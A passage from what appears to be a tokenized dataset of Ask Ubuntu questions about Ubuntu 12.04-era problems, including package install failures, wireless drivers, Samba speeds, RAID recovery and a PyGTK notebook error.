libjavascriptcoregtk-1.0-0 ( from ... /libjavascriptcoregtk-1.0-0_1.8.0-0ubuntu2_i386.deb ) ... selecting previously unselected package libwebkitgtk-1.0-common . unpacking libwebkitgtk-1.0-common ( from ... /libwebkitgtk-1.0-common_1.8.0-0ubuntu2_all.deb ) ... selecting previously unselected package libwebkitgtk-1.0-0 . unpacking libwebkitgtk-1.0-0 ( from ... /libwebkitgtk-1.0-0_1.8.0-0ubuntu2_i386.deb ) ... selecting previously unselected package chmsee . unpacking chmsee ( from ... /chmsee_1.3.0-2ubuntu2_i386.deb ) ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... processing triggers for man-db ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory setting up qmail ( 1.06-4 ) ... the hostname -f command returned : $ 1 your system needs to have a fully qualified domain name ( fqdn ) in order to install the var-qmail packages . installation aborted . dpkg : error processing qmail ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of qmail-run : qmail-run depends on qmail ( > = 1.06-2.1 ) ; however : package qmail is not configured yet . dpkg : error processing qmail-run ( -- configure ) : dependency problems - leaving unconfigured setting up libchm1 ( 2:0.40a-1 ) ... no apport report written because the error message indicates its a followup error from a previous failure . setting up libjavascriptcoregtk-1.0-0 ( 1.8.0-0ubuntu2 ) ... setting up libwebkitgtk-1.0-common ( 1.8.0-0ubuntu2 ) ... setting up libwebkitgtk-1.0-0 ( 1.8.0-0ubuntu2 ) ... setting up chmsee ( 1.3.0-2ubuntu2 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : qmail qmail-run error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) setting up qmail ( 1.06-4 ) ... the hostname -f command returned : $ 1 your system needs to have a fully qualified domain name ( fqdn ) in order to install the var-qmail packages . installation aborted . dpkg : error processing qmail ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of qmail-run : qmail-run depends on qmail ( > = 1.06-2.1 ) ; however : package qmail is not configured yet . dpkg : error processing qmail-run ( -- configure ) : dependency problems - leaving unconfigured can someone please help me in resolving this issue ? the elaboration would be most appreciated since i am very new to this .
182881	why caps lock is too slow to turn off in ubuntu ?	*th*is is a strange problem . *no*tice how the beginning of my sentences include two capitals ? well , over the years i have developed a terrible habit ... and it may be too late to fix . instead of holding shift like a normal person to capitalize my works , i hit caps lock , then hit the letter , then hit caps lock again . pretty weird huh ? i took an official government typing test recently and scored 99 words a minute , so it has n't been a huge hindrance until now that i use ubuntu . in ubuntu , often when i do my crazy method of typing , the caps lock wo n't turn off fast enough . it 's not my keyboard . i did n't have this problem in windows . it 's extremely annoying . is there a cure for this ? took the question from ubuntu forums because it 's just explaining the same problem i am having here .
182884	burning snow leopard dmg on ubuntu	so i have a sl copy of mac os x snow leopard.dmg and i am running ubuntu 12.0.4 . i tried burn the dmg to a dvd using cd/dvd creator however when i try , it comes up with a message saying 'the size of the file is over 2 gib . files larger than 2 gib are not supported by the iso9660 standard in its first and second versions ( the most widespread ones ) . it is recommended to use the third version of the iso9660 standard , which is supported by most operating systems , including linux and all versions of windowsâ˘ . however , mac os x can not read images created with version 3 of the iso9660 standard . ' how do i bypass this so my dvd is bootable on my imac . by the way , i 'm running ubuntu on the imac and it is my only partition . no other os installed
182885	why do i get `` malformed line in source list '' error ?	i just installed ubuntu 12.04 lts on my laptop dual boot with windows 7 and i got an error like this : if you know what 's wrong , please reply to this .
182886	how to get average network load instead of instant	welcome , i use conky to see network load statistics with sampling every 8 seconds in order to get somewhat more smooth history chart . unfortunately , all values i get are not average for this 8 second period , but they are sampled from much smaller time span , so charts are the same choppy , as if they were sampled from 1 second or less . is there any way to get conky ( or at least system monitor ) display system properties averaged over specified amount of time , just like windows ' task manager does ? i would like to have conky display hard drive usage from iostat , but there will be little use if it , if conky reports instant values not averaged over time . edit : there is half-solution to the specific network problem in utility ifstat . this program if run ifstat 8 1 does indeed give proper network load averages over 8-second interval . but , from obvious reasons , this call takes 8 second to complete . i am trying to learn enough lua to get this working .
182890	how long does it take to compile a kernel ( linux 3.2.5 ) ?	how long does it take to install kernel ( linux 3.2.5 ) on 12.04 using make install -j 4 command ? my terminal is displaying this for around 40 minutes now . root @ user-desktop : /usr/src/linux-3.2.5 # make install -j 4 sh /usr/src/linux-3.2.5/arch/x86/boot/install.sh 3.2.5 arch/x86/boot/bzimage \ system.map `` /boot '' run-parts : executing /etc/kernel/postinst.d/dkms 3.2.5 /boot/vmlinuz-3.2.5
182891	lubuntu netbook shows root partition full	i 've been using lubuntu netbook for quite a few days ( on asus eeepc 1015px ) , but recently i encountered a problem . i could not copy files to my root partition . i looked for the files that were eating up space , found some log files of huge size and deleted them . it worked fine for few days , but now it again shows the root partition full . output of df -h : filesystem size used avail use % mounted on /dev/sda6 22g 22g 0 100 % / udev 489m 39m 451m 8 % /dev tmpfs 199m 904k 198m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 496m 104k 496m 1 % /run/shm output of sudo du -hcs $ ( ls ) 2 > /dev/null : 8.5m bin 27m boot 4.0k cdrom 39m dev 18m etc 149m home 0 initrd.img 180m lib 16k lost+found 4.0k media 4.0k mnt 4.0k opt 2.3m root 1008k run 8.8m sbin 4.0k selinux 4.0k srv 0 sys 60k tmp 4.2g usr 399m var 0 vmlinuz 5.1g total
182896	is there any software for running direct connect hub on lan ?	is there any software for running direct connect hub on lan ? opendchub was available for 11.10 but it 's development was halted long ago and there seems to be none on 12.04 repos . i need it to run on my hostel lan . any help for compiling the opendchub source for 12.04 is also welcome .
182898	how to alter bios in vaio to allow for new battery ?	i have a vaio vgn-cr35g with 11.10 installed . i bought a new battery ( not from sony ) with double the capacity but the bios is set for the old battery . the new battery came with a cd to update the .dat file with new information about the battery , but it 's an .exe and does not work on vaio . i was thinking maybe i can alter the bios manually ? if so , how can i do that ?
182901	installing software on an offline ubuntu server	assuming that i have a server with ubuntu server newly installed on it . i was thinking of installing the very same version on virtual box ( or any other virtualization software ) , connect it to the internet and use apt-get to only download the packages for upgrading the system and the new software such as ( tomcat7 , openjdk6-default-headless..etc ) . then copy the downloaded packages from the archive folder to the offline server 's archive folder through a usb stick . so now the virtual system wo n't actually be upgraded nor have any new software installed . but would running the very same apt-get commands on the offline system without the download directive -d be executed without issues ? *edit : *this needs to be as simple as possible because i 'll have to write a guide for our client to do this on his own and so it wo n't be acceptable to require deep linux knowledge to do this .
182902	a better graphic card for my laptop ?	i have an old dell studio 1558 laptop , now i would like to change the vga card and i hope you can show me what is the best for my ubuntu laptop . here is the output of dmidecode command
182914	how to disable closing a window	it might sound ridiculous , but i want to prevent closing a window in ubuntu . i want to provide to my users a highly secure environment , without any desktop environment with just one window open . now i want to make sure user ca n't close that window . is there any way to hack around with compiz so that there is no way a user can close the window . not by pressing close button , not by pressing alt+f4 etc. ? i am open to use any window manager amongst those available in 12.04 . either of compiz , metacity , and others . i am also willing to hack around with source code if required . edit : just disabling alt+f4 from os does n't solve the problem . that is because some applications issue close commands on pressing alt+f4 even before the event is bubbled to os . i need a way by which the ability to close the window is taken away from application itself .
182915	how can i open an application without making it appear ( at all ) in the unity launcher ?	i want to open a startup application in background , but i dont want too see it in common unity panel at the left side . at the worst it will be at the task bar ( where there is a clock ) . thanks for your time . prtsc : running `` test.desktop '' with `` gcalctool '' . you see its icon with picture `` question mark ! '' link to prtsc
182916	using userdel can not remove .gvfs folder , permission denied	i am using fedora 9 . i removed the user using userdel -r command . the user is removed , but the home directory still remains . when i tried to remove the home directory ( rm -rf /home/user/ ) , i get the following message : rm : can not remove '/home/user/.gvfs ' : permission denied this happens on random occasions . which scenario does this occur ? why is this occurring ?
182917	desktop folder and files disappeared	i restarted my computer , and when i logged back in , i noticed that all of my files that were on the desktop are gone . instead , icons of all of my home folder are showed on my desktop . i opened the terminal and found out that there is no ~/desktop folder . what happened ? what do i need to do ? 12.04 32-bit wubi installed .
182920	setting different default applications for different desktop environments	i am using ubuntu 12.04 with default unity interface . i installed later the kde desktop , xfce , lxde , gnome-shell and cinnamon . the kde comes with different default applications than unity , such as kwrite for text editing , konsole as virtual terminal , kfontview for font viewing and installing , dolphin as file browser etc . other de come with some other default applications . the problem arises when you want to open a file such as a text file , with which can both be opened by gedit and kwrite , i want to use kwrite on kde and gedit on unity or gnome . but , there is no way to set like this . i can set default application for text file by changing respective settings in both kde and unity , but it become default for both de . for example , if i set kfontviewer as default font viewing application in kde , it also opens fonts when i am in unity or gnome and vice versa . this is a problem because , loading other de 's program takes long time than the default one for the used de . my question is : can i use different default applications for different de ? how ?
182923	local network speed issues , 12.04.01/smb/cifs	i have some very common setup : a file server box ( 12.4.1 / kernel 3.6 / kde ) connected to a router box ( inet , dhcp ) . wi-fi router is connected to the first one as dhcp relay . both are not the best ones , but relatively new ; b/g/n modes . and devices ; like a laptop under latest mint with 3.6 kernel , connected to ap . all devices are on the same network . when i run iperf , i have speed between them two = 70 mbit/sec . when i use samba , a big file is copied at 3.4 mbit/sec . when i mount same thing with cifs , a big file is copied at 10.4 mbit/sec . ping in between ~3ms . i have n't tried nfs yet , will do . but the question is : why would the network speeds differ that much ? i would expect 2x drop , or say 4x drop for some whatever bidirectional something , but that is 20x downspeed - with samba . is it likely something wrong with my setup - or is it some expected result ? i have couple windows laptops and would prefer to use something easy compatible like samba - but in my 12.4.1 setup smbd crashes few times a day for pattern i could not identify - and `` service restart '' does not help , so i have to reboot . smbd and nmbd logs do not show anything significant . that did not happen in 11.10 . now the other question is : should i keep fighting samba setup , or should i consider some other file sharing option that is easy with windows ? googling did not show any obvious alternative to samba . there is no big load needed on the box - a few guys sharing it as programming/apache/php/etc server , so it just needs to be reasonably quick and reliable .
182924	not a valid elf image	after installing 12.04.01 lts on a imac g5 , at the boot prompt , the message not a valid elf image prevents me from booting . please help .
182925	how to hide a running process ?	using ubuntu 12.04. is there any way to hide a running process ? that process should n't ' display in system monitor , top , htop . there is no problem to remember the process id ( pid ) so observation of the process can be done easily .but i want to hide the process completely . is there any way ?
182930	heroes of newerth inventory hotkeys	i 'm using 12.04 and when playing heroes of newerth , i have a problem when trying to use items from my inventory . i press alt+q or other combinations but nothing happens . i figured out that it 's because ubuntu opens that window where you type a command for the application you are currently using . how can i tell ubuntu not to listen for my alt key when playing hon ?
182931	hibernation : earlier warning if there 's not enough free swap space	if you hibernate and there 's not enough free swap , a message is shown after the whole desktop environment is closed . therefore it is only possible to reboot . can i check via script ( or anything else ) if there 's enough swap space before everything is closed ? thanks
182934	how to disable screen saver when watching a movie on youtube ?	i have managed to stop screen saver with vlc . but it seems that when i am watching a movie on firefox the screen saver pops in again , in a few mins . how can i tell my ubuntu 12.04 that i am watching a movie in firefox and not to turn on the screen saver each time i do so ?
182935	ca n't install drivers for alfa awus036h	like another person in this forum , i bought the awuso36h 802.11 b/g long-range usb adapter for my computer running latest version of ubuntu . problem is - i ca n't install the drivers . i open the cd folder and double click the runsetup but the following message comes back : archive : /media/usb series/autorun.exe [ /media/usb series/autorun.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /media/usb series/autorun.exe or /media/usb series/autorun.exe.zip , and can not find /media/usb series/autorun.exe.zip , period . i downloaded the latest realtek rtl8187 chipset , rebooted and everything and still ca n't download the driver . can you help ?
182937	enable wireless on dell inspiron 1300	as per subject , i 've looked at various resources and attempted ndiswrapper solutions , found a one-click solution that lead to a 404 and this but none works . i 've run all updates . once i managed to lose my wired connection as well and had to reinstall . this is my first hour with linux . iwconfig gives this before i do anything : lo no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off power management : on eth0 no wireless extens thanks for responding lspci returns 00:00.0 host bridge : intel corporation mobile 915gm/pm/gms/910gml express processor to dram controller ( rev 03 ) subsystem : dell device 01c9 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort+ > serr- < perr- intx- latency : 0 capabilities : < access denied > kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation mobile 915gm/gms/910gml express graphics controller ( rev 03 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 01c9 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 16 region 0 : memory at dff00000 ( 32-bit , non-prefetchable ) [ size=512k ] region 1 : i/o ports at eff8 [ size=8 ] region 2 : memory at c0000000 ( 32-bit , prefetchable ) [ size=256m ] region 3 : memory at dfec0000 ( 32-bit , non-prefetchable ) [ size=256k ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : intelfb , i915 00:02.1 display controller : intel corporation mobile 915gm/gms/910gml express graphics controller ( rev 03 ) subsystem : dell device 01c9 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 region 0 : memory at dff80000 ( 32-bit , non-prefetchable ) [ size=512k ] capabilities : < access denied > 00:1b.0 audio device : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller ( rev 03 ) subsystem : dell device 01c9 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 42 region 0 : memory at dfebc000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 1 ( rev 03 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=0b , subordinate=0b , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : 30000000-301fffff prefetchable memory behind bridge : 0000000030200000-00000000303fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr+ noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.3 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 4 ( rev 03 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=0c , subordinate=0d , sec-latency=0 i/o behind bridge : 0000d000-0000dfff memory behind bridge : dfc00000-dfdfffff prefetchable memory behind bridge : 00000000d0000000-00000000d01fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr+ noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 1 ( rev 03 ) ( prog-if 00 [ uhci ] ) subsystem : dell device 01c9 control : i/o+ mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 16 region 4 : i/o ports at bf80 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.1 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 2 ( rev 03 ) ( prog-if 00 [ uhci ] ) subsystem : dell device 01c9 control : i/o+ mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin b routed to irq 17 region 4 : i/o ports at bf60 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.2 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 3 ( rev 03 ) ( prog-if 00 [ uhci ] ) subsystem : dell device 01c9 control : i/o+ mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin c routed to irq 18 region 4 : i/o ports at bf40 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.3 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 4 ( rev 03 ) ( prog-if 00 [ uhci ] ) subsystem : dell device 01c9 control : i/o+ mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin d routed to irq 19 region 4 : i/o ports at bf20 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.7 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb2 ehci controller ( rev 03 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 01c9 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 16 region 0 : memory at b0000000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev d3 ) ( prog-if 01 [ subtractive decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=32 i/o behind bridge : 0000f000-00000fff memory behind bridge : dfb00000-dfbfffff prefetchable memory behind bridge : 00000000fff00000-00000000000fffff secondary status : 66mhz- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort+ < serr- < perr- bridgectl : parity- serr+ noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > 00:1f.0 isa bridge : intel corporation 82801fbm ( ich6m ) lpc interface bridge ( rev 03 ) subsystem : dell device 01c9 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap- 66mhz- udf- fastb2b- parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 kernel modules : itco_wdt , intel-rng 00:1f.1 ide interface : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) ide controller ( rev 03 ) ( prog-if 8a [ master secp prip ] ) subsystem : dell device 01c9 control : i/o+ mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 16 region 0 : i/o ports at 01f0 [ size=8 ] region 1 : i/o ports at 03f4 [ size=1 ] region 2 : i/o ports at 0170 [ size=8 ] region 3 : i/o ports at 0374 [ size=1 ] region 4 : i/o ports at bfa0 [ size=16 ] kernel driver in use : ata_piix 02:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) subsystem : dell device 01c9 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 64 interrupt : pin a routed to irq 18 region 0 : memory at dfbfc000 ( 32-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : b44 kernel modules : b44 02:03.0 network controller : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller ( rev 02 ) subsystem : dell wireless 1370 wlan mini-pci card control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap- 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 64 interrupt : pin a routed to irq 17 region 0 : memory at dfbfe000 ( 32-bit , non-prefetchable ) [ size=8k ] kernel driver in use : b43-pci-bridge kernel modules : ssb and the rfkill shows 0 : phy0 : wireless lan soft blocked : no hard blocked : no just checking addtional drivers . says no additional driver installed in this system
182942	update manager offers 900+ updates under partial upgrade mode	today i checked for updates and got an error message telling me i must do a partial upgrade . i was shocked to see how many updates there were available . 900+ updates ! by using synaptic i found out that it wanted to remove core packages from my system , such as compiz and python , but also update some as well . i am very confused why package manager would want to do this all of a sudden , and why it wants to destroy my system . i really need an answer , because i now can not update my system .
182944	how can i record an opengl game in ubuntu ?	i would like to create a short clip of me playing minecraft , an opengl game . the usual screencast recorders do not properly record opengl . what kind of software is available for this purpose ? my experience with the software in the similar ( but no longer duplicate ) question : kazam : very low framerate despite setting to 60 fps , no sound , unity menubar constantly flashing through the fullscreen window . recordmydesktop : max framerate setting is 50 fps , but the video becomes extremely fast if not using the default 15 fps . xvidcap : not available on 12.04 tibesti : not available on 12.04 wink : does not run ffmpeg : very low quality video and no sound with the recommended settings , might be tunable though ( no gui unfortunately ) . kdenlive : uses recordmydesktop , and the recorded clip becomes corrupted aconv : video sped up , often broken image , no sound
182951	rtl8192cu wont re-activate automatically after reboot	after a long search i found a driver that works for my tp-link usb wireless device ( tp-wn723n ) . it 's super stable , tx/rx is brilliant . but ... every time i reboot , i have to go into proprietary drivers , deactivate , and then reactivate to get it to work again . i 'm using an rtl8192cu driver and ubuntu 12.04 . does anybody have an idea how to fix this ? it 's really messing with my pip .
182954	file transfer mode in sftp	i am a newbie to ftp and sftp as well as linux . can you please advise what is the default mode of file transfer in sftp ? i know in ftp , we have transfer modes ( binary and ascii ) . it would also be great if you can provide any link or document which can provide me clear understanding of scp , ssh and sftp . p.s . i have been suggested to move here from stackoverflow getting -1 point there .
182967	ubiquity frontend installer for unity	i want to place an installer on my ubuntu 12.04 livecd , but now i 'm confused . there are only 2 ubiquity-frontend packages : ubiquity-frontend-gtk ubiquity-frontend-kde but not one for unity . is it possible to use gtk package with unity or how can i solve this problem ?
182971	webcam turning itself on and off	i did a fresh install of ubuntu 12.04 lts on my compaq presario c700 . i 've had previous versions installed , starting with 9.10 , but startup speed was slow so i decided to back everything up and re-create the partitions . every time i boot the system into the login screen , the webcam turns on , stays on for a few seconds , then turns off . it does the exact same thing everytime i launch shotwell . i 've also seen it come on at random times as i 've used the computer . i 'm starting to get a little paranoid , and would appreciate any help in identifying the cause of this behaviour .
182973	os drive failure and raid5 mdadm question	i 'm fairly new to ubuntu but i was able to setup my server with raid5 . the os resides on a separate drive and there are 3 drives in my array . the problem is that i had to reinstall my os on a new drive ( currently /dev/sdd ) due to a hardware failure and needed to recover my array . mdadm did not create it auto-magically after installing so i followed the instructions spamaps posted in this thread and got to the point where i recovered the array and could access it using : mdadm -- assemble /dev/md0 /dev/sda1 /dev/sdb1 /dev/sdc1 now in the next step he says that i 'll want to save the configuration if you have to do that manually : /usr/share/mdadm/mkconf and then update the initramfs for your system : update-initramfs -u this is where i am not sure how to proceed . i want to make sure that my array will come up after a reboot . thanks in advance !
182977	connecting ipod or mp3 player `` breaks '' usb	occasionally on lubuntu 12.04 64bit , when i plug in my ipod touch or my sansa clipzip+ , my usb wifi dongle will stop working , and the device will not be mounted . the only way i can fix this is by restarting it . this does n't happen every time i plug in one of the two , but it can get very annoying . what can i do to find out why this is happening ? are there logs i can look at to see why lubuntu 's usb stops working ? is there a way to restart usb so i do n't have to restart my entire computer ?
182989	how to solve fatal error : call to undefined function readline ( ) ? readline library not found ?	i have an ubuntu 12.04 lts . and xampp for linux 1.7.7 . when i code in php with and call the readline function i get this error message ? `` fatal error : call to undefined function readline ( ) '' i recently found the below thread which pointed out the name of the package that contained the desired readline : how to solve configure : error : readline library not found ? i went ahead and installed # apt-get install libreadline6 . but this didnt seem to make a difference . i still get the same error message : `` fatal error : call to undefined function readline ( ) '' . was the thread missing further steps ? can anyone help me ? i am new to ubuntu . < ? php echo `` simple menu \n '' ; echo `` 1 . play sports \n '' ; echo `` 2 . play strategy games \n '' ; $ userinput = readline ( 'enter something here : ' ) ; ? >
182990	ubuntu cd installer crashes with `` erron5 input/output error ''	i had 12.04 installed on a satellite l635 . i wanted to start over with a fresh install because i had experimented with a bunch of different things , and computer was getting glitchy and random freezes . i used the same iso i used for original install , and it keeps saying that the installer crashed with a erron5 input/output error . tried an older iso for 11.10 i had used in the past with same issue . to see if it was disc or computer ( not a great idea ) i tried the 12.04 iso on another laptop . now i have 2 laptops with no os . both discs however live boot on both systems . please help . i 've searched forums and ca n't find the same problem .
182991	software install failure	i am getting a `` package operations failed '' message at the 95 % mark of each download . details show `` reading database '' for each 5 percentage segment until reading database ... 95 % dpkg : unrecoverable fatal error aborting : failed in buffer_read ( fd ) : files list for package `gstreamer0.10-plugins-ugly' i have tried to download a number of piece of software ( most recently pdf editor ) and am getting the same message at the same point in the download . is there something wrong with my ubuntu version , a virus or is it the software being downloaded ? using 10.04 lts . p.s . same problem when trying to download updates . mik . . . thanks for the feedback . . . should start by letting you know that i 'm a recycled windows user so have very limit knowledge using the terminal window . . . hate ms , google , facebook and all the other commercial info harvesters and converted to open source sofeware and wysiwyg ubuntu two years ago . . . having said that here 's what happened when i ran sudo apt-get -f install primary @ primary-desktop : ~ $ sudo dpkg -- configure -a primary @ primary-desktop : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : linux-headers-2.6.32-21 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 51 not upgraded . primary @ primary-desktop : ~ $ apt - get autoremove the program 'apt ' is currently not installed . you can install it by typing : sudo apt-get install openjdk-6-jdk primary @ primary-desktop : ~ $ openjdk-6-jdk openjdk-6-jdk : command not found primary @ primary-desktop : ~ $ sudo apt-get install pdfedit reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : linux-headers-2.6.32-21 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libqt3-mt suggested packages : libqt3-mt-psql libqt3-mt-mysql libqt3-mt-odbc the following new packages will be installed : libqt3-mt pdfedit 0 upgraded , 2 newly installed , 0 to remove and 51 not upgraded . need to get 0b/5,380kb of archives . after this operation , 15.4mb of additional disk space will be used . do you want to continue [ y/n ] ? y selecting previously deselected package libqt3-mt . ( reading database ... 95 % dpkg : unrecoverable fatal error , aborting : failed in buffer_read ( fd ) : files list for package `gstreamer0.10-plugins-ugly ' : input/output error e : sub-process /usr/bin/dpkg returned an error code ( 2 ) primary @ primary-desktop : ~ $ still see fatal error message at 95 % `` reading database '' mark . . . appreciate further feedback . . .
182992	can i apply all updates by downloading and clicking a .deb ?	can updates be found in a standalone .deb format ? i want something just like the service packs in windows , which can be easily downloadable version-wise from anywhere without using any script and can be applied simply by double clicking .
182997	why is my gtk.notebook not fetching its label properly ?	i am using this method to save a file : def save ( self ) : file_data = configparser.configparser ( ) subjects_number = self.subjects.get_n_pages ( ) si = range ( 1 , subjects_number ) for sn in si : subject_content = self.subjects.get_nth_page ( sn ) subject_name = self.subjects.get_tab_label ( subject_content ) file_data.add_section ( subject_name ) # line 153 pages_number = self.subjects.get_nth_page ( sn ) pi = range ( 1 , pages_number ) for pn in pi : page_content = subject_content.get_nth_page ( pn ) page_name = pages.get_tab_label ( page_content ) c_buffer = page_content.get_buffer ( ) c_format = c_buffer.register_serialize_tagset ( ) serial = c_buffer.serialize ( c_format , c_buffer.get_start_iter ( ) , c_buffer.get_end_iter ( ) ) file_data.set ( subject_name , page_name , serial ) with open ( self.current_file , `` wb '' ) as this_file : file_data.write ( this_file ) print `` file saved : '' + self.current_file however when ran i get this traceback in the terminal window : traceback ( most recent call last ) : file `` /home/nja/notetaker/notetaker/notetakerwindow.py '' , line 251 , in on_btn_save_clicked self.save ( ) file `` /home/nja/notetaker/notetaker/notetakerwindow.py '' , line 153 , in save file_data.add_section ( subject_name ) file `` /usr/lib/python2.7/configparser.py '' , line 260 , in add_section if section.lower ( ) == `` default '' : attributeerror : 'label ' object has no attribute 'lower' these methods create the tabs in the gtk.notebook ( ) widgets : def 